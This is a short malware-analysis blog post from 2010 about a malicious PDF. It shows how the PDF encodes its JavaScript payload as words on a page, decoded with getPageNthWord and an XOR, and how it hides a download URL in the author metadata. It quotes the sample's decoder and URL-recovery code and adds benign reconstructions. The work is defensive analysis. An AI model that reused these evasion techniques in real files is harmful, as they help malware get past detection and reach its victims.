February 18, 2010
PDF exploits are becoming increasingly sophisticated. In particular, they often rely on creative techniques to avoid detection and slow down analysis. For a couple of examples, see Julia Wolf's and Daniel Wesemann's nice analyses of malicious documents that use the getAnnots and info tricks, where the actual malicious content is stored as annotations or as part of the document metadata (e.g., the author name).
Here is another trick that showed up recently. I'll call it the getPageNthWord trick, from the key API function it uses.
The PDF contains a JavaScript section with the following code (simplified a little):
var s = '';
new Function(decode(2, 35))();
function decode(page, xor){
    var l = this.getPageNumWords(2);
    for(var i = 0; i < l; i++){
        word = this.getPageNthWord(page, i);
        var c = word.substr(word.length - 2, 2);
        var p = unescape("%" + c).charCodeAt(0);
        s += String.fromCharCode(p ^ xor);
    }
    return s;
}
This code creates an anonymous function, sets its body to the return
value of the decode function, and then executes it.
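As a harmless illustration of that pattern, here is a minimal sketch of building a function from a string and calling it. The body string below is a made-up placeholder, not anything taken from the sample:

```javascript
// Hypothetical, benign function body standing in for the decoded payload.
const body = "return 6 * 7;";

// new Function(body) compiles the string as the body of a new function;
// nothing runs until the function is called.
const run = new Function(body);
const result = run();
```

This is why the trick is handy for an attacker: the real code never appears in the script as text, only as the output of a decoding step.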
The interesting part is in the decode function. This function gets the
number of words contained in the third page of the document via the
getPageNumWords function (recall that page numbers are 0-based in the
Acrobat JavaScript API). It then loops through all the words in that page
(via the getPageNthWord function) and manipulates them. Let's see what the
third page looks like:
11 0 obj
<<
/Length 23892
>>
stream
2 J
0.57 w
BT /F2 1.00 Tf ET
0.196 G
BT 31.19 806.15 Td ( kh29 kh2a kh55
...
kh4e kh46 kh0a kh03 kh58 kh2e kh29) Tj ET
...
endstream
endobj
The page is stored as a stream. Its contents comprise a number of
directives and the actual textual content. For example, BT indicates
the beginning of the text and, conversely, ET marks the end of the
text; 31.19 806.15 Td specifies the position of the text on the page;
and Tj is the display text operator. The actual textual content is
the string starting with kh29.
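For offline analysis, the text shown by Tj can be pulled out of a decompressed stream with a regular expression. This is only a rough sketch: the function name extractShownText is my own, and the pattern assumes simple literal strings with no nested or escaped parentheses, which real PDFs do not guarantee.

```javascript
// Collect the literal strings that are passed to the Tj operator.
// Assumption: strings contain no parentheses or backslash escapes.
function extractShownText(stream) {
  const pieces = [];
  const pattern = /\(([^()\\]*)\)\s*Tj/g;
  let match;
  while ((match = pattern.exec(stream)) !== null) {
    pieces.push(match[1]);
  }
  return pieces;
}

// Shortened sample modelled on the stream above (the elided part is left out).
const sample =
  "2 J\n0.57 w\nBT /F2 1.00 Tf ET\n0.196 G\n" +
  "BT 31.19 806.15 Td ( kh29 kh2a kh55) Tj ET";
const shown = extractShownText(sample);
```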
We can now go back to our decode routine. It extracts the last
2 characters from each word (e.g., “29” from “kh29”),
interprets them as a hex number (e.g., 0x29), xors it with 35 (e.g., 0x29 ^ 35
= 10), and finally obtains the corresponding character (e.g., “\n”).
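The same steps can be reproduced outside a PDF reader. The sketch below is my own re-implementation, not the sample's code: decodeWords is a hypothetical name, it splits the page text on whitespace instead of calling getPageNthWord, and it uses parseInt in place of the unescape trick.

```javascript
// Decode a page's words: last two characters -> hex value -> XOR -> character.
function decodeWords(pageText, xorKey) {
  let out = "";
  for (const word of pageText.split(/\s+/)) {
    const hexPair = word.slice(-2);
    // Skip empty tokens and anything that does not end in two hex digits.
    if (!/^[0-9a-fA-F]{2}$/.test(hexPair)) continue;
    out += String.fromCharCode(parseInt(hexPair, 16) ^ xorKey);
  }
  return out;
}

// The first and last words visible in the stream shown earlier.
const head = decodeWords("kh29 kh2a kh55", 35);
const tail = decodeWords("kh4e kh46 kh0a kh03 kh58 kh2e kh29", 35);
```

With key 35, the three leading words decode to a newline, a tab, and the letter v, and the seven trailing words decode to `me) {` followed by a carriage return and a newline, which already looks like JavaScript source.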
The result of this deobfuscation is the actual exploit code, which targets four different vulnerabilities. However, the exploit code has one last trick, which it uses to hide the URL from which the malware is downloaded:
var src_table = "abcd...&=%";
var dest_table= "eAFS...=iZR-";
function get_url(){
    var str = this.info.author;
    var ret = encode_str(str, dest_table, src_table);
    return ret;
};
Notice the info.author property. The get_url function essentially
performs a simple substitution decryption of the author metadata. Let's
see what is contained there:
17 0 obj
<<
/Author
(-Jj.gw-Jjrj.-JWMyD-JjTWM-JjngM-JgkjW
...
-JjrWk-Jjrgw-JgTyM-Jy0g.-JWgyg-Jgngw-JgYgY-JyygM-Jy.yC)
>>
endobj
Ugly, indeed. After decoding, one finally gets the malware URL.
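The body of encode_str is not shown above, so the following is only a guess at its general shape: a per-character lookup that maps each character found in one table to the character at the same position in the other. The name substitute and the three-character tables are made up for illustration; the real tables are elided in the listing.

```javascript
// Map every character of text from fromTable to the character at the
// same index in toTable; characters not in fromTable pass through as-is.
function substitute(text, fromTable, toTable) {
  let out = "";
  for (const ch of text) {
    const idx = fromTable.indexOf(ch);
    out += idx === -1 || idx >= toTable.length ? ch : toTable[idx];
  }
  return out;
}

// Toy tables (hypothetical), playing the roles of src_table and dest_table.
const plainTable = "abc";
const cipherTable = "xyz";
const decoded = substitute("zyx-x", cipherTable, plainTable);
```

Note the argument order in get_url: the destination table is passed first, so the lookup runs from the obfuscated alphabet back to the plain one.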
Wepawet now handles this type of malicious PDF file. See this report for an example.